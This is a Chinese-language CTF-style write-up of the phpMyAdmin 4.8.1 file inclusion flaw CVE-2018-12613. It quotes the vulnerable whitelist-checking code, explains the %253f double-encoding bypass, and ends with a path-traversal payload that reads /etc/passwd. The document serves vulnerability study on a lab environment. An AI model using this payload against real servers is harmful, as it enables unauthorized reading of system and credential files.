phpmyadmin 4.8.1 远程文件包含漏洞（CVE-2018-12613）

今天刷到了BUU上的一道题，那道题用到的就是phpmyadmin 4.8.1 远程文件包含漏洞（CVE-2018-12613）这个漏洞，所以在此总结一下

受影响版本

phpmyadmin 4.8.{1,2}

环境

https://github.com/vulhub/vulhub/tree/master/phpmyadmin/CVE-2018-12613

分析

先来看源码

if (! empty($_REQUEST['target'])//是否存在target参数
    && is_string($_REQUEST['target'])//target的值书否为字符串
    && ! preg_match('/^index/', $_REQUEST['target'])//正则匹配是否以index开头
    && ! in_array($_REQUEST['target'], $target_blacklist)//在黑名单内的过滤掉
    && Core::checkPageValidity($_REQUEST['target'])//Core类中的checkPageValidity方法
) {
    include $_REQUEST['target'];
    exit;
}

黑名单

$target_blacklist = array (//黑名单
    'import.php', 'export.php'
);

主要代码

public static function checkPageValidity(&$page, array $whitelist = [])
   {
       if (empty($whitelist)) {
           $whitelist = self::$goto_whitelist;
       }
       if (! isset($page) || !is_string($page)) {
           return false;
       }

       if (in_array($page, $whitelist)) {
           return true;
       }

       $_page = mb_substr(
           $page,
           0,
           mb_strpos($page . '?', '?')
       );
       if (in_array($_page, $whitelist)) {
           return true;
       }

       $_page = urldecode($page);
       $_page = mb_substr(
           $_page,
           0,
           mb_strpos($_page . '?', '?')
       );
       if (in_array($_page, $whitelist)) {
           return true;
       }

       return false;
   }

其实主要的代码很好理解，由于多了第二次的解码和判断，导致当传入二次编码的?（即%253f）时会取出导致db_sql.php作为参数从而绕过白名单进而达到文件读取的目的

任意文件读取

payload:

index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd